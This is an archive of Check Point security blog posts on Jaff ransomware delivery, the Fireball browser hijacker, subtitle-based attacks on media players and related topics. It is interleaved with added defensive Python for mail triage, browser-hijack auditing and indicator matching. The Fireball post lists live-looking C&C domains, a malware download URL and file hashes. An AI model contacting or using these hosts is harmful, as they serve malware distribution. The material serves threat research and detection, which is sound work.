Category Archives: Check Point


Check Point Infinity NGFW Earns NSS “Recommended” Yet Again for Security Effectiveness and Value

Category : Check Point

NSS Labs, Inc. released their results for the 2017 Next Generation Firewall Test, recognizing Check Point Infinity NGFW with “Recommended” rating. This marks our sixth NGFW “Recommended” rating for security effectiveness and value, and the fourteenth NSS “Recommended” rating overall since 2011.

This reinforces the Check Point Infinity goal of delivering the most effective and efficient security to customers across all network segments, with a Security Effectiveness Score of 99.56% in this test.

Key Check Point results from NSS Labs 2017 NGFW report include:

  • 100% protection against recent attacks (2013 – 2016) and against Apple, IBM and Oracle vulnerabilities
  • 99.9% protection against Microsoft and 99.2% protection against Adobe vulnerabilities
  • $18 TCO per Protected-Mbps

Download a copy of the NSS Labs NGFW Test Report and the Security Value Map™ for Next Generation Firewall (NGFW) today to learn how Check Point Infinity continually delivers advanced security protections at exceptional value to keep your businesses protected against any threat, anytime and anywhere.




Anatomy of the Jaff Ransomware Campaign

Category : Check Point

Last month, Check Point researchers were able to spot the distribution of Jaff Ransomware by the Necurs Botnet. The ransomware was spread using malicious PDF files that had an embedded docm file, which in turn downloaded an encoded executable. After the downloaded file was decoded, the ransomware encrypted the user’s files. In recent weeks, however, we were able to detect a new spam campaign delivering the ransomware and altering the chain of infection to use malicious WSF files.

New Campaign

On May 28, Check Point’s SandBlast Zero-Day Protection solution caught 8,000 messages delivering the ransomware, titled “Scanned Image from a Xerox WorkCentre,” a title which was in use in old spam campaigns dating back to 2013.

[Figure: a spam message from the previous campaign shown beside one from the current campaign]
Infection Chain

A zipped folder including a WSF file is attached to the spam messages in the new Jaff campaign. The WSF file contains obfuscated JavaScript, which parses various encoded strings, including hardcoded URLs from which it attempts to download the Jaff ransomware executable.

When the ransomware executes, a “.wlu” extension is appended to encrypted files’ names, as in a former Jaff campaign. In addition, the ransom note, which differs from former campaigns, is displayed on the victim’s screen.

The ransomware’s decryptor service must be accessed through the Tor Browser, as in the last Jaff campaign, and the requested ransom amount is 0.5486 BTC (approximately 1,530 USD as of June 7), lower than what was demanded by the Jaff distributors in previous campaigns.

Given that the ransomware is still also being delivered by the Necurs Botnet using PDF files with embedded docm files, the recent changes described in this article suggest that Jaff may be functioning as a RaaS (Ransomware-as-a-Service), distributed by several threat actors.

Check Point customers are protected from Jaff ransomware by SandBlast, IPS, Anti-Bot and Anti-Virus.

The IPS signature that protects against this campaign is: “Suspicious Microsoft Office File Archive Mail Attachment”.

Anti-Virus and Anti-Bot signatures include Trojan-ransom.Win32.Jaff.*.
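The delivery chain above (a ZIP attachment carrying a WSF or docm dropper, sent under a recycled lure subject) is exactly what a mail gateway can catch before any script runs. The following is an added example, not Check Point’s code and not part of the original post: it assumes the gateway hands us the subject line, the attachment name and the raw attachment bytes, and the sample archives are constructed inline. It flags scripts and executables inside archives, decoy double extensions such as “scan.pdf.wsf”, bare script attachments, and the subject line named in the post.

```python
"""Mail-gateway triage for a ZIP-wrapped WSF/docm dropper (added example)."""
import io
import zipfile
from typing import Dict, List, Tuple

# Extensions Windows treats as runnable when double-clicked. WSF and docm are
# the carriers named in the post; the others are common script/executable
# types added here as an assumption.
SCRIPT_EXTENSIONS = (".wsf", ".js", ".jse", ".vbs", ".vbe", ".hta", ".docm", ".exe", ".scr")

# "Document-looking" extensions that get placed in front of the real one.
DECOY_EXTENSIONS = ("pdf", "doc", "jpg", "png", "txt")

# Subject reused by the May 28 wave (an old lure from 2013 spam runs).
LURE_SUBJECTS = {"scanned image from a xerox workcentre"}


def script_like(name: str) -> bool:
    """True if the file name ends in an executable or script extension."""
    base = name.lower().rsplit("/", 1)[-1]
    return base.endswith(SCRIPT_EXTENSIONS)


def double_extension(name: str) -> bool:
    """True for names such as 'scan.pdf.wsf' that hide a script behind a decoy."""
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    return len(parts) >= 3 and parts[-2] in DECOY_EXTENSIONS


def suspicious_members(zip_bytes: bytes) -> List[Tuple[str, str]]:
    """List (member, reason) for every archive entry that should block delivery."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if script_like(info.filename):
                findings.append((info.filename, "script or executable inside archive"))
            if double_extension(info.filename):
                findings.append((info.filename, "decoy double extension"))
    return findings


def triage_message(subject: str, attachment_name: str, attachment: bytes) -> Dict:
    """Decide whether one message should be held, with the reasons collected."""
    reasons = []
    if subject.strip().lower() in LURE_SUBJECTS:
        reasons.append("subject matches a known lure")
    if zipfile.is_zipfile(io.BytesIO(attachment)):
        for member, why in suspicious_members(attachment):
            reasons.append(f"{member}: {why}")
    elif script_like(attachment_name):
        reasons.append(f"{attachment_name}: bare script attachment")
    return {"block": bool(reasons), "reasons": reasons}


def build_zip(members: Dict[str, str]) -> bytes:
    """Constructed sample archive from a name -> text-content mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: a campaign-style lure (inert placeholder body) and a
# benign archive for comparison.
JAFF_STYLE_ZIP = build_zip({"Scan_0017.pdf.wsf": "<job><script/></job>"})
BENIGN_ZIP = build_zip({"Q2_report.pdf": "%PDF-1.4 placeholder"})


if __name__ == "__main__":
    print(triage_message("Scanned Image from a Xerox WorkCentre", "scan.zip", JAFF_STYLE_ZIP))
    print(triage_message("Q2 numbers", "report.zip", BENIGN_ZIP))
```

The archive check is deliberately independent of the subject heuristic: lure subjects rotate between waves, while a script inside a ZIP attachment is worth holding regardless of what the message says.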



Check Point Defeats Mobile Cyberattacks

Category : Check Point

Advanced cybercrimes aren’t science fiction; they’re real – and have real consequences. Check Point is at the forefront of mobile security, ensuring that devices and data everywhere remain safe. We don’t just build cutting edge technology: we stand behind it, with the largest team of elite researchers and security engineers in the industry, who have the experience to keep you one step ahead of mobile threats. Check Point proudly delivers Mobile Threat Prevention to enterprises around the world.



FIREBALL – The Chinese Malware of 250 Million Computers Infected

Category : Check Point

Check Point Threat Intelligence and research teams recently discovered a high-volume Chinese threat operation which has infected over 250 million computers worldwide. The installed malware, Fireball, takes over target browsers and turns them into zombies. Fireball has two main functionalities: running any code on victim computers, including downloading any file or malware, and hijacking and manipulating infected users’ web traffic to generate ad revenue. Currently, Fireball installs plug-ins and additional configurations to boost its advertisements, but it could just as easily turn into a prominent distributor for any additional malware.

This operation is run by Rafotech, a large digital marketing agency based in Beijing. Rafotech uses Fireball to manipulate the victims’ browsers and turn their default search engines and home-pages into fake search engines. This redirects the queries to either or. The fake search engines include tracking pixels used to collect the users’ private information. Fireball has the ability to spy on victims, perform efficient malware dropping, and execute any malicious code on the infected machines; this creates a massive security flaw in targeted machines and networks.



  • Check Point analysts uncovered a high-volume Chinese threat operation which has infected over 250 million computers worldwide, and 20% of corporate networks.
  • The malware, called Fireball, acts as a browser-hijacker but can be turned into a full-functioning malware downloader. Fireball is capable of executing any code on the victim machines, resulting in a wide range of actions from stealing credentials to dropping additional malware.
  • Fireball is spread mostly via bundling, i.e. installed on victim machines alongside a wanted program, often without the user’s consent.
  • The operation is run by a Chinese digital marketing agency.
  • The top infected countries are India (10.1%) and Brazil (9.6%).


Figure 1: Fireball Infection Flow




The scope of the malware distribution is alarming. According to our analysis, over 250 million computers worldwide have been infected: specifically, 25.3 million infections in India (10.1%), 24.1 million in Brazil (9.6%), 16.1 million in Mexico (6.4%), and 13.1 million in Indonesia (5.2%). The United States has witnessed 5.5 million infections (2.2%).

Based on Check Point’s global sensors, 20% of all corporate networks are affected. Hit rates in the US (10.7%) and China (4.7%) are alarming, but Indonesia (60%), India (43%) and Brazil (38%) have much more dangerous hit rates.

Another indicator of the incredibly high infection rate is the popularity of Rafotech’s fake search engines. According to Alexa’s web traffic data, 14 of these fake search engines are among the top 10,000 websites, with some of them occasionally reaching the top 1,000.

Figure 2: Fireball Global Infection Rates (darker pink = more infections)


Ironically, although Rafotech doesn’t admit it produces browser-hijackers and fake search engines, it does (proudly) declare itself a successful marketing agency, reaching 300 million users worldwide – coincidentally similar to our number of estimated infections.

Figure 3: Rafotech’s Advertisement on the Company’s Official Website



Fireball and similar browser-hijackers are hybrid creatures, half seemingly legitimate software (see the GOING UNDER THE RADAR section), and half malware. Although Rafotech uses Fireball only for advertising and initiating traffic to its fake search engines, it can perform any action on the victims’ machines, and these actions can have serious consequences. How severe is it? Try to imagine a pesticide armed with a nuclear bomb. Yes, it can do the job, but it can also do much more.

These browser-hijackers have full capability at the browser level. This means that they can drive victims to malicious sites, spy on them and conduct successful malware dropping.

From a technical perspective, Fireball displays great sophistication and quality evasion techniques, including anti-detection capabilities, a multi-layer structure and a flexible C&C – it is not inferior to a typical malware.

Many threat actors would like to have a fraction of Rafotech’s power, as Fireball provides a critical backdoor, which can be further exploited.



While the distribution of Fireball is both malicious and illegitimate, it actually carries digital certificates that give it a legitimate appearance. Confused? You should be.

Rafotech carefully walks along the edge of legitimacy, knowing that adware distribution is not considered a crime like malware distribution is. How is that? Many companies provide software or services for free, and make their profits by harvesting data or presenting advertisements. Once a client agrees to the installation of extra features or software on his/her computer, it is hard to claim malicious intent on behalf of the provider.

This gray zone led to the birth of a new kind of monetizing method – bundling. Bundling is when a wanted program installs another program alongside it, sometimes with a user’s authorization and sometimes without. Rafotech uses bundling in high volume to spread Fireball.


Figure 4: Bundling in Action


According to our analysis, Rafotech’s distribution methods appear to be illegitimate and don’t follow the criteria which would allow these actions to be considered naïve or legal. The malware and the fake search engines don’t carry indicators connecting them to Rafotech, they cannot be uninstalled by an ordinary user, and they conceal their true nature.

So how do they carry digital certificates? One possibility is that issuers make their living from providing certificates, and small issuers with flexible ethics can enjoy the lack of clarity in the adware world’s legality to approve software such as Rafotech’s browser-hijackers.

As with other types of malware, there are many ways for Fireball to spread. We suspect that two popular vectors are bundling the malware to other Rafotech products – Deal Wifi and Mustang Browser – as well as bundling via other freeware distributors: products such as “Soso Desktop”, “FVP Imageviewer” and others.

It’s important to remember that when a user installs freeware, additional malware isn’t necessarily dropped at the same time. If you download a suspicious freeware and nothing happens on the spot, it doesn’t necessarily mean that something isn’t happening behind the scenes.

Furthermore, it is likely that Rafotech is using additional distribution methods, such as spreading freeware under fake names, spam, or even buying installs from threat actors.

As with everything on the internet, remember that there are no free lunches. When you download freeware, or use cost-free services (streaming and downloads, for example), the service provider is making a profit somehow. If it’s not from you or from advertisements, it will come from somewhere else.


Figure 5: Deal Wifi Installation Screen



To check if you’re infected, first open your web browser. Was your home-page set by you? Are you able to modify it? Are you familiar with your default search engine and can modify that as well? Do you remember installing all of your browser extensions?

If the answer to any of these questions is “NO”, this is a sign that you’re infected with adware. You can also use a recommended adware scanner, just to be extra cautious.
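The four questions above (home page, ability to change it, default search engine, extensions you remember installing) can be answered mechanically from the browser’s own profile data. The following is an added example, not Check Point’s code and not part of the original post. It audits a Chrome profile’s Preferences JSON; the key names it reads (homepage, session.startup_urls, default_search_provider_data.template_url_data, extensions.settings with from_webstore and manifest.name) follow Chrome’s per-profile Preferences file but should be treated as an assumption to verify against your Chrome build. TRUSTED_HOSTS, KNOWN_EXTENSION_IDS and the sample profile are constructed here; the sample home page uses hohosearch.com, one of the Rafotech domains listed in the post.

```python
"""Audit a Chrome Preferences file for hijacked home page, start-up pages,
default search engine and side-loaded extensions (added example)."""
import json
from typing import Dict, List
from urllib.parse import urlparse

# Hosts an administrator expects as home page or search engine (constructed).
TRUSTED_HOSTS = {"www.google.com", "duckduckgo.com", "intranet.example.local"}
# Extension IDs the organisation has approved (constructed placeholders).
KNOWN_EXTENSION_IDS = {"bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"}


def host_of(url: str) -> str:
    """Lower-cased host part of a URL, or '' if it has none."""
    return (urlparse(url).hostname or "").lower()


def audit_preferences(prefs: Dict) -> List[str]:
    """Return one finding per hijack symptom; an empty list means clean."""
    findings = []

    homepage = prefs.get("homepage", "")
    if homepage and host_of(homepage) not in TRUSTED_HOSTS:
        findings.append(f"home page set to untrusted host {host_of(homepage)}")

    for url in prefs.get("session", {}).get("startup_urls", []):
        if host_of(url) not in TRUSTED_HOSTS:
            findings.append(f"start-up page {url} is untrusted")

    search = prefs.get("default_search_provider_data", {}).get("template_url_data", {})
    if search and host_of(search.get("url", "")) not in TRUSTED_HOSTS:
        findings.append(
            f"default search engine '{search.get('short_name', '?')}' "
            f"queries {host_of(search.get('url', ''))}"
        )

    for ext_id, ext in prefs.get("extensions", {}).get("settings", {}).items():
        name = ext.get("manifest", {}).get("name", ext_id)
        # Side-loaded (non-Web-Store) extensions are how bundlers add "search
        # helpers". Chrome's own component extensions also report
        # from_webstore=false, so an ID allowlist is paired with the flag.
        if not ext.get("from_webstore", False) and ext_id not in KNOWN_EXTENSION_IDS:
            findings.append(f"extension '{name}' ({ext_id}) was not installed from the Web Store")
    return findings


def audit_file(path: str) -> List[str]:
    """Audit the Preferences file at the given path (e.g. a profile's 'Preferences')."""
    with open(path, encoding="utf-8") as fh:
        return audit_preferences(json.load(fh))


# Constructed profile showing every symptom at once.
SAMPLE_PREFS = json.loads("""{
  "homepage": "http://hohosearch.com/",
  "homepage_is_newtabpage": false,
  "session": {"restore_on_startup": 4, "startup_urls": ["http://hohosearch.com/"]},
  "default_search_provider_data": {"template_url_data": {
      "short_name": "Hoho Search", "keyword": "hohosearch.com",
      "url": "http://hohosearch.com/search?q={searchTerms}"}},
  "extensions": {"settings": {
      "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {"from_webstore": false, "manifest": {"name": "Search Helper"}},
      "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {"from_webstore": true, "manifest": {"name": "Approved Blocker"}}
  }}
}""")


if __name__ == "__main__":
    for finding in audit_preferences(SAMPLE_PREFS):
        print("!", finding)
```

Run it against a copied Preferences file rather than the live one (Chrome rewrites the file while it is open), and feed the findings to whatever endpoint inventory you already collect; a fleet-wide count of profiles whose search engine points at an unknown host is a far better infection gauge than asking each user the four questions.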

Figure 6: a Fake Search Engine Run by Rafotech




It doesn’t take much to imagine a scenario in which Rafotech decides to harvest sensitive information from all of its infected machines, and sell this data to threat groups or business rivals. Banking and credit card credentials, medical files, patents and business plans can all be widely exposed and abused by threat actors for various purposes. Based on our estimated infection rate, in such a scenario, one out of five corporations worldwide will be susceptible to a major breach. Severe damage can be caused to key organizations, from major service providers to critical infrastructure operators to medical institutions. The potential loss is indescribable, and repairing the damage caused by such massive data leakage (if even possible) could take years.

Rafotech holds the power to initiate a global catastrophe and it is not alone. During our research we’ve tracked down additional browser-hijackers that, to our understanding, were developed by other companies. One such company is ELEX Technology, an Internet services company also based in Beijing, which produces products similar to those of Rafotech. Several findings lead us to suspect that the two companies are related, and may be collaborating in the distribution of browser-hijackers or in trading customers’ traffic. For example, an adware developed by ELEX, named YAC (“Yet Another Cleaner”), is suspected to be connected to Rafotech’s operation, dropping its browser-hijackers.



In this research we’ve described Rafotech’s browser-hijackers operation – possibly the largest infection operation in history. We believe that although this is not a typical malware attack campaign, it has the potential to cause irreversible damage to its victims as well as worldwide internet users, and therefore it must be blocked by security companies.

The full distribution of Fireball is not yet known, but it is clear that it presents a great threat to the global cyber ecosystem. With a quarter billion infected machines and a grip in one of every five corporate networks, Rafotech’s activities make it an immense threat.



To remove almost any adware, follow these simple steps:

  1. Uninstall the adware by removing the application from the Programs and Features list in the Windows Control Panel.

     For Mac OS users:
       a. Use the Finder to locate the Applications folder.
       b. Drag the suspicious file to the Trash.
       c. Empty the Trash.

     Note – A usable program is not always installed on the machine and therefore may not be found on the program list.

  2. Scan and clean your machine, using:
       • Anti-Malware software
       • Adware cleaner software

  3. Remove malicious Add-ons, extensions or plug-ins from your browser:

     On Google Chrome:
       a. Click the Chrome menu icon and select Tools > Extensions.
       b. Locate and select any suspicious Add-ons.
       c. Click the trash can icon to delete.

     On Internet Explorer:
       a. Click the Settings icon and select Manage Add-ons.
       b. Locate and remove any malicious Add-ons.

     On Mozilla Firefox:
       a. Click the Firefox menu icon and go to the Tools tab.
       b. Select Add-ons > Extensions. A new window opens.
       c. Remove any suspicious Add-ons.
       d. Go to the Add-ons manager > Plugins.
       e. Locate and disable any malicious plugins.

     On Safari:
       a. Make sure the browser is active.
       b. Click the Safari tab and select Preferences. A new window opens.
       c. Select the Extensions tab.
       d. Locate and uninstall any suspicious extensions.

  4. Restore your internet browser to its default settings:

     On Google Chrome:
       a. Click the Chrome menu icon, and select Settings.
       b. In the On startup section, click Set Pages.
       c. Delete the malicious pages from the Startup pages list.
       d. Find the Show Home button option and select Change.
       e. In the Open this page field, delete the malicious search engine page.
       f. In the Search section, select Manage search engines.
       g. Select the malicious search engine page and remove it from the list.

     On Internet Explorer:
       a. Select the Tools tab and then select Internet Options. A new window opens.
       b. In the Advanced tab, select Reset.
       c. Check the Delete personal settings box.
       d. Click the Reset button.

     On Mozilla Firefox:
       a. Enable the browser Menu Bar by clicking the blank space near the page tabs.
       b. Click the Help tab, and go to Troubleshooting information. A new window opens.
       c. Select Reset Firefox.

     On Safari:
       a. Select the Safari tab and then select Preferences. A new window opens.
       b. In the Privacy tab, click the Manage Website Data… button. A new window opens.
       c. Click the Remove All button.


C&C addresses

  • attirerpage[.]com
  • s2s[.]rafotech[.]com
  • trotux[.]com
  • startpageing123[.]com
  • funcionapage[.]com
  • universalsearches[.]com
  • thewebanswers[.]com
  • nicesearches[.]com
  • youndoo[.]com
  • giqepofa[.]com
  • mustang-browser[.]com
  • forestbrowser[.]com
  • luckysearch123[.]com
  • ooxxsearch[.]com
  • search2000s[.]com
  • walasearch[.]com
  • hohosearch[.]com
  • yessearches[.]com
  • d3l4qa0kmel7is[.]cloudfront[.]net
  • d5ou3dytze6uf[.]cloudfront[.]net
  • d1vh0xkmncek4z[.]cloudfront[.]net
  • d26r15y2ken1t9[.]cloudfront[.]net
  • d11eq81k50lwgi[.]cloudfront[.]net
  • ddyv8sl7ewq1w[.]cloudfront[.]net
  • d3i1asoswufp5k[.]cloudfront[.]net
  • dc44qjwal3p07[.]cloudfront[.]net
  • dv2m1uumnsgtu[.]cloudfront[.]net
  • d1mxvenloqrqmu[.]cloudfront[.]net
  • dfrs12kz9qye2[.]cloudfront[.]net
  • dgkytklfjrqkb[.]cloudfront[.]net
  • dgkytklfjrqkb[.]cloudfront[.]net/main/trmz[.]exe


File Hashes

  • FAB40A7BDE5250A6BC8644F4D6B9C28F
  • 69FFDF99149D19BE7DC1C52F33AAA651
  • B56D1D35D46630335E03AF9ADD84B488
  • 8C61A6937963507DC87D8BF00385C0BC
  • 7ADB7F56E81456F3B421C01AB19B1900
  • 84DCB96BDD84389D4449F13EAC75098
  • 2B307E28CE531157611825EB0854C15F
  • 7B2868FAA915A7FC6E2D7CC5A965B1E
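The C&C addresses and file hashes above are only useful once they are matched against something, typically resolver logs and an endpoint file inventory. The following is an added example, not Check Point’s code and not part of the original post. It copies a subset of the indicators from the lists above (kept defanged with “[.]” so the source file never resolves them by accident), refangs them at run time, and matches DNS query lines and MD5 values against them; the log line format, the log lines and the inventory hashes are constructed for the example. Matching is exact-or-subdomain against the listed hosts only, so an unrelated cloudfront.net name does not trip it.

```python
"""Match the Fireball C&C domains and file hashes against DNS logs and a
file inventory (added example)."""
import re
from typing import Iterable, List, Optional, Set, Tuple

# Subset of the C&C list above; extend with the remaining entries as needed.
FIREBALL_C2_DEFANGED = [
    "attirerpage[.]com", "s2s[.]rafotech[.]com", "trotux[.]com",
    "startpageing123[.]com", "funcionapage[.]com", "universalsearches[.]com",
    "hohosearch[.]com", "yessearches[.]com", "mustang-browser[.]com",
    "d3l4qa0kmel7is[.]cloudfront[.]net", "dgkytklfjrqkb[.]cloudfront[.]net",
    "dgkytklfjrqkb[.]cloudfront[.]net/main/trmz[.]exe",  # URL form: host part is used
]
# Subset of the published MD5s above.
FIREBALL_HASHES = {
    "FAB40A7BDE5250A6BC8644F4D6B9C28F", "69FFDF99149D19BE7DC1C52F33AAA651",
    "B56D1D35D46630335E03AF9ADD84B488", "8C61A6937963507DC87D8BF00385C0BC",
    "7ADB7F56E81456F3B421C01AB19B1900", "2B307E28CE531157611825EB0854C15F",
}


def refang_host(ioc: str) -> str:
    """'s2s[.]rafotech[.]com/path' -> 's2s.rafotech.com' (lower-case, host only)."""
    return ioc.replace("[.]", ".").split("/", 1)[0].lower().rstrip(".")


FIREBALL_C2_HOSTS = sorted({refang_host(i) for i in FIREBALL_C2_DEFANGED})


def matching_indicator(host: str, indicators: Iterable[str]) -> Optional[str]:
    """Return the indicator that equals host or is a parent domain of it.

    Only the listed hosts match: 'cdn.cloudfront.net' is not covered by
    'dgkytklfjrqkb.cloudfront.net', but 'www.attirerpage.com' is by
    'attirerpage.com'."""
    host = host.lower().rstrip(".")
    for ioc in indicators:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


# Constructed resolver log format: <timestamp> client=<ip> query=<name> type=<rr>
LINE_RE = re.compile(r"client=(?P<client>\S+)\s+query=(?P<query>\S+)")


def scan_dns_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client, queried name, matched indicator) for every C&C lookup."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ioc = matching_indicator(m["query"], FIREBALL_C2_HOSTS)
        if ioc:
            hits.append((m["client"], m["query"], ioc))
    return hits


def known_bad_hashes(inventory: Iterable[str]) -> Set[str]:
    """Intersect an inventory of MD5s (any case) with the published hashes."""
    return {h.upper() for h in inventory if h.upper() in FIREBALL_HASHES}


# Constructed sample log: two benign lookups and two C&C lookups from two hosts.
SAMPLE_DNS_LOG = """\
2017-06-01T10:00:00Z client=10.0.0.5 query=www.google.com type=A
2017-06-01T10:00:02Z client=10.0.0.5 query=s2s.rafotech.com type=A
2017-06-01T10:00:05Z client=10.0.0.9 query=dgkytklfjrqkb.cloudfront.net type=A
2017-06-01T10:00:07Z client=10.0.0.9 query=images.example.com type=A
"""

if __name__ == "__main__":
    for client, name, ioc in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{client} queried {name} (indicator {ioc})")
```

The client address in each hit is the thing to act on: with the post’s figure of one in five corporate networks affected, a list of internal hosts that resolved any of these names is the quickest way to size the cleanup before touching individual machines.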



Securing the Connected Car Steps Up a Gear

Category : Check Point

“Here in my car, I feel safest of all…” That line from Gary Numan’s hit single ‘Cars’ sums up the way many of us feel when we’re driving: safe and protected in the privacy of our vehicles. But cars are increasingly connected to the outside world. Features that were once only available on premium luxury brands are now available across manufacturers’ model ranges, in basic city cars. These features include Bluetooth connectivity for pairing mobile phones, GPS navigation, 4G Wi-Fi hotspots, collision avoidance systems, remote diagnostics and more. In fact, with these capabilities, cars are rapidly becoming data networks on wheels.

The production of new cars equipped with data connectivity, either through a built-in communications module or by a tether to a mobile device, was forecast by Gartner to reach 12.4 million during 2016, increasing to 61 million in 2020 – representing nearly 70% of all cars shipped globally. This external connectivity is also mirrored in cars’ control systems, with even basic vehicles now using multiple electronic control units containing millions of lines of code, controlling all aspects of the car from engine management to the brakes, steering and entertainment systems. But as development of the electronically controlled, connected car sped up, security was left behind.

Over the past couple of years, researchers have repeatedly demonstrated how connected cars can be hacked and controlled from afar – in particular in 2015 when two white-hat hackers remotely took control of a Jeep Cherokee. This incident prompted Chrysler to recall 1.4 million vehicles. While a malicious cyberattack on a vehicle has yet to take place, the potential danger is real – so much so that the FBI, Department of Transportation, and National Highway Traffic Safety Administration issued a memo warning of the dangers to connected vehicles – including hackers disabling a vehicle’s brakes or steering, shutting the engine down, or manipulating other on-board systems. The report states, “These cars have become moving endpoints which continue to stay defenseless. Their mobility and distinct entry points pose significant difficulties to protect them. Just imagine trying to guard a moving castle which has to allow visitors in from several different avenues.”

To address this increasingly complex challenge, Check Point, HDBaseT Alliance and Valens are revving up their engines and joining forces to develop the best solution for protecting connected cars. Today, we announced that we are joining HDBaseT Alliance’s Automotive Working Group to define new cyber-security industry standards and co-develop solutions for the next generation of connected automobiles.

Check Point will lead the Cyber Security Working Group, and Valens, inventor of HDBaseT and HDBaseT Alliance founder, will play a central role in the collaboration to accelerate design and development of these requirements. Argus Cyber Security, the world’s largest independent automotive cyber security company, is also joining the Alliance, and will be the first company to join the Cyber Security Working Group.

Issues that the working group will address include: how to guarantee the connected car’s robust network configuration and segregation, firewalling, security level ranking, and securing external communications and third-party solutions.

While in-vehicle connectivity continues to advance, and new technologies become available, we must address the advanced cybersecurity risks they pose. Security for the connected car is no longer optional, it’s a lifesaver – for drivers, other road users and pedestrians too. By joining the HDBaseT Alliance, we intend to steer the design of the best security solutions for today’s and tomorrow’s car industry, to be one step ahead of automotive threats – delivering security that moves even faster than hackers can.


Hacked in Translation – from Subtitles to Complete Takeover

Category : Check Point

Check Point researchers revealed a new attack vector which threatens millions of users worldwide – attack by subtitles. By crafting malicious subtitle files, which are then downloaded by a victim’s media player, attackers can take complete control over any type of device via vulnerabilities found in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time and Stremio. We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerabilities reported in recent years.

What is it?

Perpetrators use various methods, also referred to as ‘attack vectors’, to deliver cyberattacks. These attack vectors can be divided into two major categories: either the attacker persuades the user to visit a malicious website, or he tricks him into running a malicious file on his computer.

Our research reveals a new possible attack vector, using a completely overlooked technique in which the cyberattack is delivered when movie subtitles are loaded by the user’s media player. These subtitle repositories are, in practice, treated as a trusted source by the user or media player; our research also reveals that those repositories can be manipulated and made to award the attacker’s malicious subtitles a high score, which results in those specific subtitles being served to the user. This method requires little or no deliberate action on the part of the user, making it all the more dangerous.

Unlike traditional attack vectors, which security firms and users are widely aware of, movie subtitles are perceived as nothing more than benign text files. This means users, Anti-Virus software, and other security solutions vet them without trying to assess their real nature, leaving millions of users exposed to this risk.

What is the root cause?

The attack vector relies heavily on the poor state of security in the way various media players process subtitle files, and on the large number of subtitle formats. To begin with, there are over 25 subtitle formats in use, each with unique features and capabilities. Media players often need to parse multiple subtitle formats to ensure coverage and provide a better user experience, with each media player using a different method. Like other, similar situations which involve fragmented software, this results in numerous distinct vulnerabilities.

What’s the effect?

Scope: The total number of the affected users is in the hundreds of millions. Each of the media players found to be vulnerable to date has millions of users, and we believe other media players could be vulnerable to similar attacks as well. VLC has over 170 million downloads of its latest version alone, which was released June 5, 2016. Kodi (XBMC) has reached over 10 million unique users per day, and nearly 40 million unique users each month. No current estimates exist for Popcorn Time usage, but it’s safe to assume that the number is likewise in the millions.

Damage: By conducting attacks through subtitles, hackers can take complete control over any device running them. From this point on, the attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device. The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more.

Which media players are affected?

To date, we tested and found vulnerabilities in four of the most prominent media players: VLC, Kodi, Popcorn Time and Stremio. We have reason to believe similar vulnerabilities exist in other media players as well. We followed the responsible disclosure guidelines and reported all vulnerabilities and exploits to the developers of the vulnerable media players. Some of the issues were already fixed, while others are still under investigation. To allow the developers more time to address the vulnerabilities, we’ve decided not to publish any further technical details at this point.

Platforms Update:

IPS Signatures:

  • Popcorn Time Subtitles Remote Code Execution
  • Kodi Open Subtitles Addon Remote Code Execution
  • VLC ParseJSS Null Skip Subtitle Remote Code Execution
  • Stremio Subtitles Remote Code Execution

How can this attack vector spread?

Delving even further into the subtitle supply chain produced some interesting results. There are a number of shared online repositories, such as, that index and rank movie subtitles. Some media players download subtitles automatically; these repositories hold extensive potential for attackers. Our researchers were also able to show that by manipulating the website’s ranking algorithm, we could guarantee crafted malicious subtitles would be those automatically downloaded by the media player, allowing a hacker to take complete control over the entire subtitle supply chain, without resorting to a Man in the Middle attack or requiring user interaction. This vulnerability also affects users who use these rankings to decide which subtitles to download manually.



Below is a Proof-of-Concept video, demonstrating how an attacker can use malicious subtitles to take over your machine.


Global Ransomware Attack “WannaCry” Still Infecting Organizations in 150+ countries

Category : Check Point

Ransomware cyber attacks are quickly becoming the preferred method of attack by cybercriminals. WannaCry, the latest global incident, is particularly damaging because it is also a worm—not just a ransomware program. As a result, it looks for other computers to spread to. When it infects a new computer, it encrypts the data and locks out the owner until a minimum of $300 in bitcoin is paid. To achieve its unprecedented rate of circulation across networks, WannaCry ransomware utilizes a Windows OS vulnerability that was recently exposed as part of the leaked NSA hacker tools.

The good news: Check Point SandBlast and Anti-Ransomware solutions protect against the WannaCry attack

The threat extraction component strips the malware that is embedded in the infected phishing emails, and the solutions block malware from reaching endpoint devices and encrypting files. In addition, Check Point IPS and anti-malware solutions block the exploits included in the malware. This gives organizations time needed to patch any vulnerable systems.

Learn how to prevent ransomware attacks against your organization. Read the whitepaper to discover:

  • The latest approaches used by cybercriminals
  • Why traditional approaches to security are not enough; and
  • The key steps to take to keep your organization safe.

Download White Paper


DiamondFox modular malware – a one-stop shop

Category : Check Point

Check Point researchers have conducted a thorough investigation of the DiamondFox malware-as-a-service in collaboration with Terbium Labs, a Dark Web Data Intelligence company. The report includes a review of the malware’s sales procedure and customer reviews, as well as a full technical analysis of its multiple plugins. For the full DiamondFox report click here.

Check Point Threat Intelligence teams constantly track the latest attack trends, campaigns and attack methods to maintain an up-to-date and accurate view of the cyber threat landscape.

In recent years, an effective new business method has penetrated the thriving malware and attack tools market and led to the establishment of an entire industry – malware-as-a-service. This provides unskilled threat actors an easy entrance to the cyberattack world, and enables each user to start their own attack campaign without any technical knowledge. Drive-by attack methods, ransomware, banking Trojans and a variety of attack tools are now traded in underground forums and use a wide range of payment methods.

